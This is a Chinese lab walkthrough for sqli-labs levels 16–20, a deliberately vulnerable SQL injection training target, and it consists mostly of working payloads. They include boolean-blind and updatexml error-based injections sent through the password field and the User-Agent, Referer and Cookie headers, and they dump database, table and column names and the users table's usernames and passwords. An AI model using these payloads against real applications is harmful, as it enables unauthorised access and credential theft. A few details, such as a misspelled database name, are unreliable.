sqli-labs靶场通关攻略 16-20

主页有sqli-labs靶场通关攻略 1-15

第十六关 less-16

​

步骤一：判断闭合方式为admin")  and 1=1#

​

步骤二：判断列数

admin") order by 2 # 数据正常

admin") order by 3 #数据报错

得出结果2列

​

​

步骤三：判断数据库长度

1") or length(database())=8 #

​

说明数据裤字符长度为8

步骤四：判断数据库名

1") or substr((select database()),1,1)='s' #

​

说明数据库的第一个字符为's'通过该语句得出数据库名为'sericuty'

步骤五：判断表名

（1）确定表数量

") or (select count(table_name) from information_schema.tables where table_schema=database())=4 #

​

说明有四个表

（2）表名：1") or substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e' #

​

找到user表

步骤六：判断表中列名

1") or substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u' #

​users表中有username

步骤七：查询数据

1") or substr((select username from users limit 0,1),1,1)='D' #

第十七关 less-17

步骤一：利用Burp Suite抓包 username：admin password：admin抓到数据发送打Repeater

步骤二：在passwd=admin后输入'报错

闭合方式为' --+

步骤三：查询数据库

admin'and updatexml(1,concat(1,database()),1)--+

步骤四：查表名

admin' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+

步骤五：查列名

admin' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+

第十八关 less-18

步骤一：利用Burp Suite抓包 username：admin password：admin抓到数据发送打Repeater

步骤二：在User-agent后输入'报错

闭合方式为1' and'

步骤三：查询数据库

1'and updatexml(1,concat(1,database()),1)and'

步骤四：查表名

1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) and'

步骤五：查列名

1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)and'

步骤六：查看users表中所有信息

1' and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)and'

第十九关 less-19

步骤一：利用Burp Suite抓包 username：admin password：admin抓到数据发送打Repeater

步骤二：在Referer后输入'报错

闭合方式为' and'

步骤三：查询数据库

'and updatexml(1,concat(1,database()),1)and'

步骤四：查表名

1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) and'

步骤五：查列名

1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) and'

步骤六：查看users表中所有信息

1' and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)and'

第二十关 less-20

步骤一：利用Burp Suite抓包 username：admin password：admin抓到数据发送打Repeater

步骤二：在Cookie后输入'报错

闭合方式为' --+

步骤三：查询数据库

'and updatexml(1,concat(1,database()),1)--+

步骤四：查表名

' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+

步骤五：查列名

' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+

步骤六：查看表中信息

' and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)--+